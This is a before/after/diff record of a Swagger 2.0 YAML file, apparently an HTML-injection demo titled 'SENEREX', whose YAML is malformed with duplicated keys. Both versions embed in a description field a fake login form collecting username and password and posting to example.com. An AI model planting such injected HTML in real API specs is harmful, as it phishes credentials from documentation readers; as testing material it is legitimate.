test.yaml (before)
swagger: "2.0"
info:
  version: "1.0.0"
  title: "🧪 DEV SYSTEM MESSAGE DEMO"
  description: |
    ## ⚠️ DEVELOPMENT SYSTEM NOTICE ⚠️

    Banner ASCII berikut digunakan untuk **testing internal** di environment dev.

    ### 🔧 SENEREX Banner
    ```
    ███████╗███████╗███╗   ██╗███████╗██████╗ ███████╗██╗  ██╗
    ██╔════╝██╔════╝████╗  ██║██╔════╝██╔══██╗██╔════╝╚██╗██╔╝
    ███████╗█████╗  ██╔██╗ ██║█████╗  ██████╔╝█████╗   ╚███╔╝ 
    ╚════██║██╔══╝  ██║╚██╗██║██╔══╝  ██╔══██╗██╔══╝   ██╔██╗ 
    ███████║███████╗██║ ╚████║███████╗██║  ██║███████╗██╔╝ ██╗
    ╚══════╝╚══════╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
    ```
swagger: "2.0"
info:
  version: "1.0.0"
paths:
  /demo:
    get:
      summary: "Demo endpoint"
      description: "Endpoint untuk testing Swagger 2.0"
      responses:
        200:
          description: "OK"


  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection SENEREX : Fake Login</h1>
    </div>
    <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful

test.yaml (after)
swagger: "2.0"
info:
  version: "1.0.0"
  title: "🧪 DEV SYSTEM MESSAGE DEMO"
  description: |
    ## ⚠️ DEVELOPMENT SYSTEM NOTICE ⚠️

    Banner ASCII berikut digunakan untuk **testing internal** di environment dev.

    ### 🔧 SENEREX Banner
    ```
    ███████╗███████╗███╗   ██╗███████╗██████╗ ███████╗██╗  ██╗
    ██╔════╝██╔════╝████╗  ██║██╔════╝██╔══██╗██╔════╝╚██╗██╔╝
    ███████╗█████╗  ██╔██╗ ██║█████╗  ██████╔╝█████╗   ╚███╔╝ 
    ╚════██║██╔══╝  ██║╚██╗██║██╔══╝  ██╔══██╗██╔══╝   ██╔██╗ 
    ███████║███████╗██║ ╚████║███████╗██║  ██║███████╗██╔╝ ██╗
    ╚══════╝╚══════╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
    ```

paths:
  /demo:
    get:
      summary: "Demo endpoint"
      description: "Endpoint untuk testing Swagger 2.0"
      responses:
        200:
          description: "OK"

swagger: "2.0"
info:
  version: "1.0.0"
paths:
  /demo:
    get:
      summary: "Demo endpoint"
      description: "Endpoint untuk testing Swagger 2.0"
      responses:
        200:
          description: "OK"


  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection SENEREX : Fake Login</h1>
    </div>
    <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful

test.yaml (diff)
@@ -16,6 +16,16 @@ info:
     ███████║███████╗██║ ╚████║███████╗██║  ██║███████╗██╔╝ ██╗
     ╚══════╝╚══════╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
     ```
+
+paths:
+  /demo:
+    get:
+      summary: "Demo endpoint"
+      description: "Endpoint untuk testing Swagger 2.0"
+      responses:
+        200:
+          description: "OK"
+
 swagger: "2.0"
 info:
   version: "1.0.0"
